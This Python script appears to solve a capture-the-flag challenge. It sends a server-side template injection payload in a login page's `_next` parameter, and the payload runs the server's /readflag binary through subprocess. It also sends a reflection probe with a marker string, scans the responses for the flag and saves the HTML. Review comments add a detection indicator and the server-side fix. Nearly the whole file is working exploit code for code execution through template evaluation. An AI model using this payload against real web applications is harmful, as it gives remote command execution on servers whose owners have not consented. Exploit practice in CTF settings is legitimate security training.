#!/usr/bin/env python3
import requests
import urllib3
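# Silence only the certificate warning instead of every urllib3 warning.
# All requests below use verify=False, so the server's identity is not
# authenticated and every response (including the file written to disk) has to
# be treated as untrusted content.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

BASE_URL = "https://vulnerability-research-dbfd88d4dab49dc2.chals.uoftctf.org"
LOGIN_URL = BASE_URL + "/welcome/default/user/login"

# Upper bound (seconds) for each request. requests has no default timeout, so
# without this an unresponsive challenge instance blocks the script forever.
REQUEST_TIMEOUT = 15

MARKER = "FINDME_12345"


def fetch_login(next_value):
    """GET the login page with *next_value* as the ``_next`` query parameter.

    Raises the usual ``requests`` exceptions (including ``Timeout``) so a
    failed probe is visible instead of hanging.
    """
    return requests.get(
        LOGIN_URL,
        params={"_next": next_value},
        verify=False,
        timeout=REQUEST_TIMEOUT,
    )


# Test with readflag payload.
# The value is a template expression: the probe checks whether the login page
# evaluates `_next` on the server instead of treating it as an opaque redirect
# target.
# NOTE(review): the server side is not visible from this script. Defensive
# reading: template delimiters (`{{`) in `_next` are a log-searchable
# indicator, and the server-side fix is to validate `_next` as a redirect
# target and never pass request parameters to the template renderer.
payload = "{{=__import__('subprocess').check_output(['/readflag']).decode()}}"

response = fetch_login(payload)

print(f"Status: {response.status_code}")
print(f"Length: {len(response.text)}")

# Simple search for flag, printing the previous and next line for context.
# NOTE(review): "uoft" is also part of the host name in BASE_URL, so a line
# that merely echoes the host matches as well; a hit is not proof of a flag.
lines = response.text.split('\n')
last_index = len(lines) - 1
for i, line in enumerate(lines):
    if 'uoft' in line.lower():
        print(f"\n[!!!] Line {i} contains 'uoft':")
        print(line)
        print(lines[i-1] if i > 0 else "")
        print(lines[i+1] if i < last_index else "")

# Save response. The file holds server-controlled markup fetched without
# certificate verification; inspect it as text rather than rendering it.
with open("readflag_next.html", "w", encoding="utf-8") as f:
    f.write(response.text)

print("\nSaved to readflag_next.html")

# Also check for the marker to see where it appears.
# NOTE(review): the marker text is part of the submitted value, so finding it
# in the body shows where `_next` is reflected; on its own it does not
# distinguish evaluation from plain reflection.
marker_response = fetch_login("{{='" + MARKER + "'}}")

idx = marker_response.text.find(MARKER)  # single scan; -1 means absent
if idx != -1:
    print(f"\n[+] Marker found at position {idx}")
    print("Context:")
    print(marker_response.text[max(0, idx-300):idx+300])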